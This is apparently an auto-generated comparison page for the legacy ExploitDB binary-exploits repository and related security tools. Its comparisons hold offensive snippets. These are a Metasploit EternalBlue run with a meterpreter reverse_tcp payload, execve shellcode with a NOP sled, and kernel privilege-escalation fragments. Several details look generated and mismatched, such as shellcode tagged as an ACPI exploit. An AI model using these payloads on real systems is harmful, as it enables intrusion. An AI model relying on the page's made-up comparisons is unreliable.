Convert Figma logo to code with AI

offensive-security logoexploitdb-bin-sploits

The legacy Exploit Database repository - New repo located at https://gitlab.com/exploit-database/exploitdb-bin-sploits

1,766
531
1,766
0

Top Related Projects

Metasploit Framework

linux-kernel-exploits Linux平台提权漏洞集合

windows-kernel-exploits Windows平台提权漏洞集合

5,843

PEDA - Python Exploit Development Assistance for GDB

6,807

GEF (GDB Enhanced Features) - a modern experience for GDB with advanced debugging capabilities for exploit devs & reverse engineers on Linux

Some setup scripts for security research tools.

Quick Overview

The offensive-security/exploitdb-bin-sploits repository is a collection of binary exploits and proof-of-concept code for various vulnerabilities. It serves as a companion to the Exploit Database (ExploitDB), providing compiled binaries and executables for security researchers, penetration testers, and ethical hackers to study and use in controlled environments.

Pros

  • Extensive collection of ready-to-use binary exploits
  • Regularly updated with new exploits and vulnerabilities
  • Valuable resource for security professionals and researchers
  • Complements the main ExploitDB repository with compiled versions

Cons

  • Potential for misuse by malicious actors
  • Some binaries may be flagged by antivirus software
  • Requires careful handling and a controlled environment for testing
  • May not include source code for all exploits, limiting educational value

Getting Started

As this is not a code library but a collection of binary exploits, there is no traditional "getting started" section with code examples. However, here are some general guidelines for using the repository:

  1. Clone the repository:

    git clone https://github.com/offensive-security/exploitdb-bin-sploits.git
    
  2. Navigate to the desired exploit directory based on the vulnerability or target system.

  3. Use the binaries in a controlled, isolated environment to avoid unintended consequences.

  4. Always obtain proper authorization before testing exploits on any systems you don't own.

  5. Keep the repository updated regularly:

    git pull origin master
    
  6. Refer to the main ExploitDB (https://www.exploit-db.com/) for additional information on specific exploits and vulnerabilities.

Remember to use these exploits responsibly and ethically, and always comply with applicable laws and regulations.

Competitor Comparisons

Metasploit Framework

Pros of Metasploit-Framework

  • Comprehensive framework with a wide range of tools and modules
  • Active development and regular updates
  • Extensive documentation and community support

Cons of Metasploit-Framework

  • Larger learning curve due to its complexity
  • Requires more system resources to run effectively
  • May be overkill for simple penetration testing tasks

Code Comparison

Metasploit-Framework:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

ExploitDB-Bin-Sploits:

./exploit.sh 192.168.1.100

Summary

Metasploit-Framework is a comprehensive penetration testing framework with a wide range of features and regular updates. It offers extensive documentation and community support but has a steeper learning curve and requires more resources.

ExploitDB-Bin-Sploits, on the other hand, is a collection of pre-compiled exploits that are generally simpler to use but may lack the flexibility and extensive features of Metasploit-Framework.

The code comparison shows that Metasploit-Framework typically requires more configuration steps, while ExploitDB-Bin-Sploits often involves running a single script with minimal parameters.

Choose Metasploit-Framework for comprehensive penetration testing and ExploitDB-Bin-Sploits for quick, specific exploit execution.

linux-kernel-exploits Linux平台提权漏洞集合

Pros of linux-kernel-exploits

  • Focused specifically on Linux kernel exploits, providing a more targeted resource
  • Includes detailed descriptions and usage instructions for each exploit
  • Regularly updated with new exploits as they become available

Cons of linux-kernel-exploits

  • Smaller collection of exploits compared to exploitdb-bin-sploits
  • Limited to Linux kernel vulnerabilities, lacking coverage for other platforms
  • May not include as many historical or older exploits

Code Comparison

linux-kernel-exploits:

void __attribute__((regparm(3))) (*commit_creds)(struct cred *new);
void __attribute__((regparm(3))) (*prepare_kernel_cred)(struct task_struct *daemon);
unsigned long (*kallsyms_lookup_name)(const char *name);

exploitdb-bin-sploits:

#!/usr/bin/python
import sys
import struct
import socket

if len(sys.argv) != 3:
    print "Usage: %s <target ip> <target port>" % sys.argv[0]

The code snippets demonstrate the different focus areas of each repository, with linux-kernel-exploits showing low-level kernel manipulation and exploitdb-bin-sploits featuring a more general-purpose exploit structure.

windows-kernel-exploits Windows平台提权漏洞集合

Pros of windows-kernel-exploits

  • Focused specifically on Windows kernel exploits, providing a more targeted resource
  • Includes pre-compiled binaries for easier deployment in certain scenarios
  • Regularly updated with new exploits and vulnerabilities

Cons of windows-kernel-exploits

  • Limited scope compared to exploitdb-bin-sploits, which covers a broader range of platforms and exploit types
  • May lack the extensive documentation and searchability of the Exploit-DB platform
  • Potentially higher risk of false positives or outdated exploits due to less rigorous vetting process

Code Comparison

windows-kernel-exploits:

# Example: MS16-032
$ms16_032 = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
"@

exploitdb-bin-sploits:

# Example: Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
buf = "\x90" * 100
buf += "\x60\x31\xc0\x40\x40\x40\x40\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80\x61\xc3"

Both repositories provide exploit code, but windows-kernel-exploits focuses on Windows-specific exploits, often in PowerShell or C#, while exploitdb-bin-sploits covers a wider range of platforms and languages.

5,843

PEDA - Python Exploit Development Assistance for GDB

Pros of PEDA

  • Enhances GDB with visual debugging features, making it easier to analyze and exploit binaries
  • Provides useful commands for exploit development, such as pattern creation and offset finding
  • Actively maintained and regularly updated with new features

Cons of PEDA

  • Focused solely on GDB enhancement, not a comprehensive exploit database
  • Requires GDB and Python, which may not be available in all environments
  • Limited to x86 and x86-64 architectures

Code Comparison

PEDA example (command within GDB):

gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

ExploitDB-bin-sploits typically contains compiled exploit binaries, so a direct code comparison is not applicable.

Summary

PEDA is a powerful GDB extension for exploit development, offering visual debugging and useful commands. ExploitDB-bin-sploits, on the other hand, is a collection of pre-compiled exploit binaries. While PEDA enhances the debugging process, ExploitDB-bin-sploits provides ready-to-use exploits for various vulnerabilities.

6,807

GEF (GDB Enhanced Features) - a modern experience for GDB with advanced debugging capabilities for exploit devs & reverse engineers on Linux

Pros of gef

  • Provides an enhanced debugging experience with GDB, offering features like memory analysis and exploit development tools
  • Actively maintained and regularly updated with new features and improvements
  • Supports multiple architectures, making it versatile for different debugging scenarios

Cons of gef

  • Requires more setup and configuration compared to exploitdb-bin-sploits
  • May have a steeper learning curve for users new to advanced debugging techniques
  • Focused primarily on debugging and exploit development, rather than providing a comprehensive exploit database

Code Comparison

gef:

@register_command
def heap(self):
    """Base command to get information about the heap."""
    self.usage()
    return

@heap.subcommand("chunks")
def heap_chunks(self):
    """Command to print all heap chunks."""
    print_heap_chunks()

exploitdb-bin-sploits:

#!/bin/bash
# Exploit Title: Linux Kernel 2.6.37 - 'Full-Nelson.c'
# Date: 2010-09-10
# Author: Dan Rosenberg
# CVE: 2010-4258

Note: The code snippets are representative examples and may not reflect the entire codebase of each project.

Some setup scripts for security research tools.

Pros of ctf-tools

  • Comprehensive collection of tools specifically for CTF competitions
  • Easy installation and management of multiple tools through a unified interface
  • Regularly updated with new tools and improvements

Cons of ctf-tools

  • Focused primarily on CTF tools, which may not cover all exploit scenarios
  • Requires manual setup and configuration for some tools
  • May include tools that are less stable or well-maintained compared to exploitdb-bin-sploits

Code Comparison

exploitdb-bin-sploits:

./searchsploit apache 2.4

ctf-tools:

./ctf-tools/bin/manage-tools install pwntools
./ctf-tools/bin/manage-tools install radare2

Summary

exploitdb-bin-sploits provides a vast collection of pre-compiled exploits, making it easier to find and use specific exploits quickly. It's maintained by Offensive Security and regularly updated.

ctf-tools offers a broader range of tools for various CTF challenges, including exploitation, reverse engineering, and cryptography. It's community-driven and provides a convenient way to manage multiple tools, but may require more setup and configuration.

Choose exploitdb-bin-sploits for quick access to specific exploits, or ctf-tools for a more comprehensive toolkit tailored for CTF competitions.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README